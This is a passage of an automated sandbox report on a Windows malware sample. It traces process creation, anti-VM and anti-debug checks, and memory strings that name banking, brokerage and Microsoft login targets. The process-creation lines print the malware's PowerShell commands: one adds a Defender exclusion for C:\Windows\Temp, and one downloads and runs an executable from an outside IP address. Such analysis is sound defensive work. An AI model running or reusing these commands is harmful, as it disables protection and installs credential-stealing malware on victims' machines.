              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72B5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,10_2_00007FF75A72B5B0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F73F0 GetLogicalDriveStringsW,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6F73F0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A709038 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,10_2_00007FF75A709038
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\migration\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\migration\wtr\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Launcher.exe, 00000003.00000002.2238182922.0000000002D3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2258576936.000001D9D073F000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2258576936.000001D9D073F000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: powershell.exe, 00000000.00000002.2138728163.00000219AF777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2268295113.000001D9D26DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\Temp\xdnfl52f.civ.exeAPI call chain: ExitProcess graph end nodegraph_10-69011
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FA430 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,_invalid_parameter_noinfo_noreturn,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,10_2_00007FF75A6FA430
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0067FE37
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72D804 GetLastError,IsDebuggerPresent,OutputDebugStringW,10_2_00007FF75A72D804
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0066B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,3_2_0066B905
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A719EEC GetProcessHeap,10_2_00007FF75A719EEC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067FAC0 SetUnhandledExceptionFilter,3_2_0067FAC0
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067F4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0067F4CC
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0067FE37
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71EC08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF75A71EC08
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A707F68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF75A707F68
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71F498 SetUnhandledExceptionFilter,10_2_00007FF75A71F498
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71F2B8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF75A71F2B8
              Source: C:\Windows\Temp\Launcher.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6EB420 ShellExecuteW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6EB420
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\Launcher.exe "C:\Windows\Temp\Launcher.exe" Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'"Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\Temp\xdnfl52f.civ.exe "C:\Windows\Temp\xdnfl52f.civ.exe" Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067C76C SetSecurityDescriptorDacl,GetLastError,3_2_0067C76C
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067DA20 GetCurrentProcess,OpenProcessToken,malloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,free,CloseHandle,3_2_0067DA20
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71DF10 cpuid 10_2_00007FF75A71DF10
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,10_2_00007FF75A718C04
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: EnumSystemLocalesW,10_2_00007FF75A70DAE0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: EnumSystemLocalesW,10_2_00007FF75A718F60
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_00007FF75A7190C8
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: GetLocaleInfoW,10_2_00007FF75A70E020
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: EnumSystemLocalesW,10_2_00007FF75A719030
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_00007FF75A719468
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: GetLocaleInfoEx,FormatMessageA,10_2_00007FF75A72B170
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: GetLocaleInfoW,10_2_00007FF75A719310
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: GetLocaleInfoW,10_2_00007FF75A719518
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_00007FF75A71964C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Temp\Launcher.exeQueries volume information: C:\Windows\Temp\iviewers.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
